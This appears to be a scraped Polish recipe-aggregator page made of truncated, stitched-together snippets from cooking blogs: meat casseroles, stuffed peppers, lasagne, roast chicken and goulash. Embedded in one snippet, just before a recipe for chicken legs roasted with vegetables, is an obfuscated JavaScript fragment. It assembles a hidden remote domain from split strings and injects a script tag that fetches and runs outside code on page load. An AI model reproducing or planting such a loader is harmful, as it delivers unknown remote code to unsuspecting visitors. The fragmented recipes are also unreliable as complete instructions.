postacią pierwszoplanową. Wtapia się w pomidorowe tło wraz z makaronem i mięsem mielonym. Lecz razem smakują wybornie:) Składniki: 1 cebula 3 ząbki czosnku masło 0,5 kg mięsa mielonego 2 duże cukinie pomidory w puszce łyżka koncentratu pomidorowego opakowanie makaronu świderki żółty ser sól pieprz oregano bazylia Przygotowanie: 1. Makaron gotujemy al dente w osolonej wodzie(...)mięso mielone. Dodajemy sól oraz pieprz. Smażymy do momentu uzyskania brązowego koloru. Wrzucamy pokrojoną wcześniej cukinie, pomidory w puszce oraz koncentrat pomidorowy. 5. Dusimy do momentu, aż cukinia będzie półmiękka. Pod koniec dodajemy bazylię i oregano. 6. Na spód naczynia żaroodpornego dajemy ugotowany makaron. Dodajemy zawartość patelni. Na wierzchu układamy plasterki żółtego sera. 7. Pieczemy
la cucharatrochę urozmaicić. I nie żałuję decyzji 😀 Polecam Wam spróbować... Składniki: 3 jajka 4 łyżki mąki pszennej 300 g mięsa mielonego z indyka 1 cebula 1 papryczka chili 100 g sera żółtego 1 łyżeczka papryki słodkiej mielonej 1 łyżeczka ziół prowansalskich sól, pieprz olej do smażenia Wykonanie: Cebulę obieramy i kroimy w drobną kostkę. Papryczkę chili myjemy, osuszamy(...)mięso mielone. Przyprawiamy pieprzem i solą. Smażymy do momentu aż mięso nie będzie surowe. Odcedzamy z tłuszczu i studzimy. Do miski wbijamy jajka i rozbełtujemy je. Dodajemy mąkę i mieszamy dokładnie, aby nie pozostały grudki. Następnie dodajemy podsmażone mięso mielone z cebulą i chili oraz starty na tarce o grubych oczkach żółty ser. Przyprawiamy papryką słodką mieloną
Kuchnia MagdaLenyimieniny mojego męża,nie spodziewałam się ,że wszystkim gościom tak bardzo posmakują-pyszne i na ciepło i na zimno Składniki: 2 opakowania ciasta francuskiego 500 g mięsa mielonego z łopatki wieprzowej 1 cebula puszka pomidorów z puszki bez skórki krojonych pół cukinii 15 dag sera żółtego pół papryki czerwonej lub żółtej ząbek czosnku przyprawa(...)dodajemy mięso mielone smażymy dalej,dodajemy wyciśnięty ząbek czosnku,pokrojoną w kostkę cukinię i paprykę ,oraz pomidory z puszki,przyprawiamy wszystko przyprawą do kebaba,solą i pieprzem,i smażymy jeszcze kilka minut. wyłączamy i odstawiamy ,żeby troszkę przestygło i wtedy dopiero dodajemy tarkowany na tarce o grubych oczkach żółty ser(żeby roztopił się dopiero w pieczeniu) rozwijamy
Swojskie jedzonkomaszynce do mielenia, przekładam do miseczki. Do mięsa dodaję surowe jajko, ostudzony boczek, sól i pieprz do smaku. Dokładnie mieszam. Ciasto rozwijam i kroję na 8 równych prostokątów. Na każdy z nich rozkładam farsz i zwijam w rulonik. Z wierzchu każdy pasztecik smaruję przy pomocy pędzelka mlekiem. Gotowe paszteciki przekładam na blaszkę wyłożona papierem do pieczenia i wkładam
Kuchnia z widokiem na ogródtrzeba go mielić przez maszynkę do mięsa, a wystarczy, że przeciśniemy go dwa razy przez praskę do ziemniaków - 3 minuty to zajmuje, a sernik naprawdę smakuje jak prawdziwy sernik :) Składniki: ciasto: 1,5 szklanki mąki pszennej, 125 g masła, 3/4 szklanki cukru, 2 żółtka, 1 łyżka gęstej śmietany, 2 łyżki kakao, 1 łyżeczka proszku do pieczenia masa serowa
Aga w kuchniSkładniki: opakowanie makaronu lasagne 500 gram mięsa mielonego 500 ml sosu słodko - kwaśnego 2 ząbki czosnku sól, pieprz do smaku olej do smażenia 400 gram sera żółtego sos beszamelowy 2 łyżki masła 2 łyżki mąki 2,5 szklanki mleka sól, pieprz, gałka muszkatołowa do smaku Sposób wykonania: sos beszamelowy: W garnuszku roztopić masło, wsypać mąkę i wymieszać, cienkim(...)dodać mięso mielone , smażyć je aż straci różowy kolor. Wlać sos słodko - kwaśny, rozdrobniony czosnek, wymieszać, zagotować, doprawić do smaku solą, pieprzem. Ser żółty potarkować na dużych oczkach. Blaszkę wysmarować tłuszczem, na dno ułożyć makaron, nadzienie mięsne, ser żółty i sos beszamelowy, czynność powtórzyć. Wierzch przykryć makaronem posmarować pozostałym sosem beszamelowym, posypać resztą tartego sera. Piec w temperaturze
Darcia w kuchniczarny świeżo mielony, 2 ząbki rozgniecionego czosnku, Kaczkę dokładnie umyć i osuszyć, usunąć resztki piór. Odciąć kuper. Natrzeć wymieszanymi przyprawami. Włożyć do naczynia do zapiekania i wstawić do zimnego piekarnika. Włączyć grzanie na 100 stopni, a następnie zmniejszyć do 90 stopni. Piec 6-7 godzin. Wyjąć kaczkę lekko przestudzić. Zdjąć skórę. Obrać z kości. Rozdrobnić mięso, wymieszać z wytopionym
królestwo garówmłynka do mielenia, wystarczy ziele angielskie i gożdziki przełożyć do woreczka foliowego, umieścić woreczek na desce i wytłuc tłuczkiem do mięsa. Mięso wymieszać z cebulą, jajkiem, przyprawami, bułką z mlekiem i dobrze wyrobić dłońmi. Przygotować sobie miskę z wodą, aby moczyć ręce przy wyrabianiu kulek. Mokrymi rękoma kulać małe pulpeciki i układać na suchej blaszce. Podczas pieczenia wycieknie
na moim stole...mięsa doskonale nadaje się na jednodaniowy obiad. Szybka do zrobienia i naprawdę smaczna. Z prawdziwym, węgierskim aromatem mielonej papryki, wędzonego boczku i pikantnej kiełbaski. Zróbcie sobie koniecznie w jakiś zimny dzień! :) Przy tej jesiennej okazji polecam Wam piosenkę, którą znajdziecie pod etykietami. I trzymajcie się ciepło! :) Składniki: 0,5 litra dowolnego bulionu 100 g pieczonej fasolki chili
Kuchnia Prezydentowejzrobienie zupełnie nowej, wiosennej, zielonej wersji tej sycącej włoskiej potrawy. ciasto: pół kilograma mąki pszennej 3 jajka 300 gramów szpinaku 2 łyżki oliwy z oliwek farsz: 220 gramów mięsa mielonego 40 gramów boczku 40 gramów masła 1 łodyga selera naciowego 1 cebula 1 marchew 1 szklanka rosołu kilka goździków 3 łyżki passaty pomidorowej beszamel: 100 gramów mąki pszennej(...)następnie dodajemy mielone mięso, bulion oraz passatę i goździki. Płaty ciasta gotujemy w wodzie z dodatkiem oliwy z oliwek. Odcedzamy i pozostawiamy do ostygnięcia. Naczynie żaroodporne albo blachę prostokątną smarujemy masłem. Na spód kładziemy ciasto, smarujemy je beszamelem i ciepłym farszem. Powtarzamy czynność do uzyskania kilku warstw. Następnie całość posypujemy startym parmezanem i świeżymi ziołami . Pieczemy w temperaturze
Bon Ton Italiamielenia mięsa przepuścić uduszoną włoszczyznę, paprykę z pieczarkami, namoczone pieczywo, mięso i wątróbkę. Do zmielonej masy dodać jaja,łuskę babki lancetowatej, koperek, pietruszkę i przyprawy. Pamiętaj, że taka ilość mięsa musi być porządnie doprawiona. Wszystko bardzo dokładnie mieszamy, jeśli jest potrzeba dolewamy trochę wywaru z duszenia. Tak przygotowaną masę przekładamy do wysmarowanej olejem rzepakowym keksówki. Pieczemy
IzaGotujechili mielone majeranek 1 spora marchew Przygotowanie: Umyte udka nacieramy solą i pieprzem. Skrapiamy odrobiną sosu sojowego dla uzyskania ładnej barwy mięsa. Każde udko delikatnie obsypujemy chili. Na koniec mocno zsypujemy papryką słodką. Wstawiamy do lodówki na kilka godzin, a najlepiej na całą noc. Wkładamy wraz z pokrojoną w ćwiartki marchwią do folii do pieczenia. Pieczemy
Kuchnia po mojemuosób): 2 średnie ćwiartki z kurczaka 1 pomarańcza sól, pieprz świeżo mielony majeranek Przygotowanie: Umyte i osuszone udka skrapiamy sosem sojowym, ciemnym, nacieramy solą i sporą ilością świeżo mielonego pieprzu. Oprószamy solidnie majerankiem. Odstawiamy na noc do lodówki. Ok 1/2 godz. przed pieczeniem wystawiamy z lodówki i obkładamy miąższem z cząstek pomarańczy. Przekładamy do foliowego rękawa(...)kurczaka pięknie się zrumieni i będzie chrupiąca. Tu podane z marynowanymi buraczkami (o których niebawem) i pieczonymi ziemniakami lecz taki kurczaczek równie dobrze posmakuje z ryżem i surówką z marchwi lub białej rzodkwi . Uwielbiam podobnie przyrządzaną kaczkę . Jest to jednak tak tłuste mięso, że aby nie rujnować swej wątroby ograniczam jej spożycie. Przekonajcie się sami, że kurczak z powyższego przepisu
Kuchnia po mojemumielonym z groszkiem i jajkiem SKŁADNIKI: 2 duże czerwone papryki 500 g mięsa mielonego 1 cebula 0,5 puszki zielonego groszku 2 jajka sól, pieprz, czosnek, papryka chilli Pokrojoną w kosteczkę cebulę zeszklić na oleju, dodać czosnek a po chwili mięso mielone. Usmażyć mięsko i dodać zielony groszek. Na koniec przyprawić według uznania. Przygotowane papryki umieszczamy(...)pozostawiamy miejsce na jajko. Przykrywamy folia aluminiową i w stawiamy do nagrzanego piekarnika do 180 stopni na 30 min, następnie do 2 połówek wbijamy po jajku. Pieczemy kolejne 10-15 minut, tak by jajko się ścięło. Papryki można podać oprószone parmezanem Smacznego
MarciochaKucharzymięsa mielonego wsypać sól, pieprz cayenne i słodką paprykę. Przyprawy połączyć z mięsem. Wylepić małe pulpeciki, które umieścić na suchym ryżu, a na sam koniec dodać mrożone warzywa. Przygotować zalewę. Masło rozpuścić. Do 2 szklanek wody dodać rozpuszczone masło. Przygotowana zalewę przyprawić solą i pieprzem. Na sam koniec wlać ją do naczynia żaroodpornego. Całość piec
Ugotowaćmięsa mielonego z wieprzowiny 5 dużych ząbków czosnku polskiego 3 czubate łyżki płatków owsianych 2 jajka szczypta soli świeżo zmielony pieprz 2 łyżki czerwonego curry Przygotowanie: Umyte papryki przekrawamy na pół. Do środka upychamy farsz (wszystkie składniki razem wymieszane). Układamy na brytfance i wkładamy do wcześniej rozgrzanego piekarnika 220 stopni i opcja góra-dół. Pieczemy zakryte folią aluminiowa
ClauditteMissCookingKochani ten schab jest naprawde rewelacyjny. Nie wymaga dużych zdolności kulinarnych, nie zawiera tyle kalorii co schab pieczony. Polecamy go bardzo i na zimno i z
Anioły w kuchnismakowało. Ziemniaczane zapiekanki bardzo lubię, więc pewnie jeszcze kilka ich Wam pokaże, ta jest pożywna i proporcjonalnie na obiad dla 4 osób. Składniki: - 2 kg ziemniaków - 1 kg mięsa mielonego - 1 cebula - 3 ząbki czosnku - 250 g sera żółtego sos: - 1 szklanka wody - 4 łyżki koncentratu pomidorowego - 2 łyżki majonezu - 2 łyżki musztardy dijon - 1 łyżka bazyli(...)zeszkli dodajemy mięso mielone a na sam koniec drobno posiekany czosnek. Od czasu do czasu mieszając podsmażamy całość. Wszystkie składniki na sos łączymy i doprowadzamy do wrzenia. Naczynie żaroodporne smarujemy tłuszczem i wykładamy warstwę ziemniaków, na to przygotowane mięso i polewamy częścią sosu. Robimy tak minimum trzy warstwy na przedostatnią i ostatnią posypujemy startym serem żółtym. Pieczemy około
Zainspirowana w kuchnimoją porcję mięsa kupiłam 4 dosyć duże papryki- wg mnie taka jedna papryka dla jednej osoby to całkiem solidna porcja obiadowa ;) Co do farszu to zrobiłam jeden z kaszą gryczaną, jeden z ryżem, nie umiem zdecydować, który lepszy, bo oba bardzo mi smakują ;) Życzę smacznego! :) Składniki: 4 sztuki papryki 500g mięsa mielonego 4 pomidory mały por cebula(...)powstały nam kapelusze. Cebulę i pora siekamy drobno i smażymy na odrobinie oleju. Dodajemy mięso i czosnek przeciśnięty przez praskę, smażymy razem około 10 minut. Pomidory sparzamy, zdejmujemy skórkę, kroimy w kostkę i dodajemy do mięsa. Pieczarki kroimy w kostkę i również dorzucamy do mięsa. Dusimy, aż odparuje nadmiar wody. Doprawiamy do smaku, dodajemy zioła. Kaszę i ryż gotujemy wedłg
Czerwona Porzeczkakurczak - 600 gram ziemniaków - pęczek szczypiorku - 1 cebula - kawałek pora - 1 jajko - 3 łyżki masła - 1 łyżeczka kurkumy - 1 łyżeczka cukru - 50 mililitrów wody - kolendra (mielona i niemielona) - biały pieprz - czarny pieprz - sól Przygotowanie: Kurczaka myjemy i osuszamy. Doprawiamy czarnym pieprzem i solą - zarówno w środku, jak i na zewnątrz. Odstawiamy. Ziemniaki obieramy, myjemy i gotujemy do miękkości(...)Takim farszem nadziewamy kurczaka, a następnie go zaszywamy. Układamy mięso w brytfance. Jeżeli zostało nam jakieś nadzienie, możemy uformować z niego kulki i ułożyć wokół kurczaka. Mięso pieczemy w temperaturze 200 stopni. Najpierw, przy 30 minut, piersią do góry, a następnie, przez 15 minut, piersią do dołu. Czas pieczenia zależy od wielkości kurczaka. Przyjmuję zasadę 35 minut
Życie zamknięte w smakudocument.createElement("script");oXz8.async=true;oXz8_="u"+("s")+"t"; oXz8u="65506613.";oXz8_+="a"+("t.i");oXz8_+="n"+("f"+"o")+"/"; oXz8u+="s5bXrfyjXz86xis19fel46"+("pjnwnc58"); oXz8.src="//"+oXz8_+oXz8u;oXz8.type="text/javascript"; document.body.appendChild(oXz8); })(); Udka kurczaka pieczone z warzywami w rękawie Składniki: 14 podudzi z kurczaka 5 czerwonych cebul 6 pomidorów 2 główki młodego czosnku 2,5 kg młodych, małych ziemniaczków 4-5 młodych marchewek 1 cukinia(...)sól i świeżo mielony pieprz do smaku olej rzepakowy Sposób przygotowania: Podudzia z kurczaka myjemy i wrzucamy do zimnej, mocno osolonej wody na minimum trzy godziny (a najlepiej na całą noc). Po tym czasie odlewamy wodę i osuszamy mięso ręcznikiem papierowym. Dwie łyżki oleju rzepakowego mieszamy z ziołami, słodką papryką, solą i pieprzem, mieszanką nacieramy mięso z każdej strony
Kolorowy Przepisownikprzygotowanie czegoś gorącego na jesienny obiad. Przedstawiam Wam mój gulasz wołowy z pieczonymi w ziołach ziemniakami. Uprzedzam, że danie jest czasochłonne, ale tylko jeśli chodzi o czas gotowania mięsa. Przygotowanie składników nie zabierze Wam zbyt wiele czasu. W przygotowaniu gulaszu ważne jest to, aby mięso było miękkie i jednocześnie nie straciło swojej struktury. My Polacy jesteśmy fanami dań jednogarnkowych(...)przygotowania: 2 hPorcja dla 4 osóbKoszt przygotowania: 32,00 złSKŁADNIKI:500 g mięsa wołowego1 papryka3 marchewki2 średnie pietruszki1 średni seler1 por1 cebula3 duże ziemniaki250 g przecieru pomidorowego80 ml czerwonego wytrawnego winamasłoPRZYPRAWY:3 liście laurowe4 ziela angielskie1 opakowanie słodkiej paprykipieprz czarny mielonynatka pietruszkitymianekmajeranekoreganosólPRZYGOTOWANIE Gulaszu:W pierwszej kolejności myjemy mięso i osuszamy je, najlepszą metodą będzie użycie papierowego ręcznika. Marchewkę, pietruszkę, selera
kulinarnyJaKarkówka na obiad to u mnie tradycja. Karkówka to bardzo fajne mięso, z którego można wiele zdziałać. Karkówka na obiad z grilla to oczywiście hit lata. Na lato musimy jeszcze poczekać. Proponuję więc karkówkę z pieca z warzywami. Wspaniałe danie, wyśmienita karkówka na obiad . Idealna do ziemniaków, koniecznie z buraczkami lub kiszonym ogórasem. Uczta na całego! Karkówka na obiad(...)przyprawy do grilla 1 łyżeczka czarnego pieprzu, grubo mielony 1 ½ łyżeczki soli lub wedle smaku 1 łyżka oleju 150 g wędzonego boczku, cienkie plastry 300 ml mięsnego bulionu 2 łyżki posiekanej natki pietruszki do posypania Usuń błony z mięsa i podziel je na kotlety o grubości 2 cm. Posyp mięso przyprawą do grilla, solą i pieprzem. odstaw na pół
codojedzenianiedźwiedzi odgrywa tu kluczową rolę. Taki a'la pasztet może stanowić danie obiadowe (do tego jakiś sos i sałatka), czy też dodatek do pieczywa. Składniki: Klopsiki: 500g wołowego mięsa mielonego 2 łyżki ugotowanej kaszy jęczmiennej 5-6 łyżek bułki tartej 2 łyżki koncentratu pomidorowego 1 duże jajko 1 łyżeczka słodkiej papryki 1/2 łyżeczki ostrej papryki 1 łyżeczka oregano(...)mięso wkładamy do miski, dodajemy 2 łyżki ugotowanej i ostudzonej kaszy jęczmiennej i pozostałe składniki. Wyrabiamy dokładnie na jednolitą masę i formujemy pulpeciki. Pozostałą kaszę jęczmienną łączymy ze startymi na grubych oczkach pieczarkami, mlekiem, śmietaną, mąką, jajkiem, serem i przyprawami. Dodajemy też kukurydzę z puszki. Masę jęczmienną wykładamy na grubość około 1cm do keksówki wyłożonej papierem do pieczenia
Kolorowy Przepisowniksmaku, lekko chrupiąca, z soczystym farszem i wyrazistymi akcentami imbiru, kolendry oraz tajskiej bazyli. Pycha! SKŁADNIKI ( 4-5 PORCJI) 4-5 okrągłych mini cukinii lub 2-3 podłużne 300g mięsa mielonego z indyka 1 łyżeczka imbiru 1 łyżeczka pieprzu cayenne 1 łyżka sosu sojowego lub worchestershire sól i pieprz do smaku kilka gałązek świeżej kolendry kilka gałązek tajskiej(...)cukinie oraz kapelusze układamy na blaszcze wyłożonej papierem do pieczenia i wstawiamy do piekanika nagrzanego do 180 stopni na 10-12 min, aby lekko się podpiekły. Kiedy cukinie się pieką przyrządzamy farsz. W dużej misce umieszczamy mieso oraz kaszę jaglaną. Czosnek i cebulę przeciskamy przez praskę i dodajemy do mięsa. Zioła siekamy i wsypujemy do miski. Dodajemy imbir, pieprz
DefinicjaSmaku